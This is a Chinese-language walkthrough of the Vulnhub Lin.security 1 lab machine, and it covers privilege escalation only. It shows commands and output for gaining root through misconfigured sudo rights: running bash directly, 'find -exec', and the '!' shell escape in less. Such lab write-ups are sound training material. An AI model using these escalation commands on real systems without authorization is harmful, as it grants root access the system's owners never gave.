【Vulnhub通关】Lin.security


准备工作

靶机基本信息

靶机名称:Lin.security 1
操作系统:Linux
网络连接方式:桥接至物理网络
渗透测试目标:提权至root用户
靶机登录信息:bob/secret

下载地址:1. Lin.Security: 1 ~ VulnHub

2. vulnhub靶机_免费高速下载|百度网盘-分享无限制(推荐VMware版)

环境配置

从分享的网盘链接中下载靶机压缩包并解压后,点击VMware Workstation主页的File => Open按钮,在弹出的文件选择窗口中选中Lin.security.ovf文件打开后即可导入靶机。使用上面给出的登录凭据即可登录系统进行提权练习。

P.S. 本台靶机只有权限提升部分哦~


权限提升

本地信息收集

登录系统之后,首先上传LinPeas工具进行信息收集。

系统基本信息

部分CVE漏洞信息

容器软件信息

系统进程信息

计划任务信息

系统用户信息

特殊权限文件

Sudo命令

bash提权

因为使用sudo命令之后发现可以运行各种终端,因此我们可以直接使用sudo运行终端软件提权:

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo /bin/bash
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

常用命令提权

除了各种终端软件,我们还可以使用诸如awkfind这种命令进行提权。下面介绍find命令提权:

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo find . -exec /bin/bash \; -quit
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

find命令有一个可以用于执行任意系统命令的危险参数-exec 这里允许使用sudo运行find命令,因此该命令会以root权限执行/bin/bash

文本分页查看工具提权

一些可以分页查看文本的工具,诸如lessmoreman等,在其文本查看界面可以使用!符号执行系统命令,但前提是必须使用这些工具查看大文件(如/var/log/syslog),这样才能触发它们的分页查看功能。

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo less /var/log/syslog
[sudo] password for bob: 
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

本次靶机渗透到此结束

相关推荐
枷锁—sha3 分钟前
【SRC】SQL注入WAF 绕过应对策略(二)
网络·数据库·python·sql·安全·网络安全
桌面运维家1 小时前
vDisk安全启动策略怎么应用?防止恶意引导攻击
安全
我是一只puppy2 小时前
使用AI进行代码审查
javascript·人工智能·git·安全·源代码管理
迎仔3 小时前
10-网络安全监控与事件响应:数字世界的智能监控与应急系统
网络·安全·web安全
x-cmd7 小时前
[x-cmd] jsoup 1.22.1 版本发布,引入 re2j 引擎,让 HTML 解析更安全高效
前端·安全·html·x-cmd·jsoup
kali-Myon7 小时前
2025春秋杯网络安全联赛冬季赛-day2
python·安全·web安全·ai·php·pwn·ctf
独行soc7 小时前
2026年渗透测试面试题总结-19(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
kali-Myon8 小时前
2025春秋杯网络安全联赛冬季赛-day1
java·sql·安全·web安全·ai·php·web
wwwlyj1233218 小时前
对称加密和非对称加密
安全
kali-Myon9 小时前
2025春秋杯网络安全联赛冬季赛-day3
python·安全·web安全·ai·php·web·ctf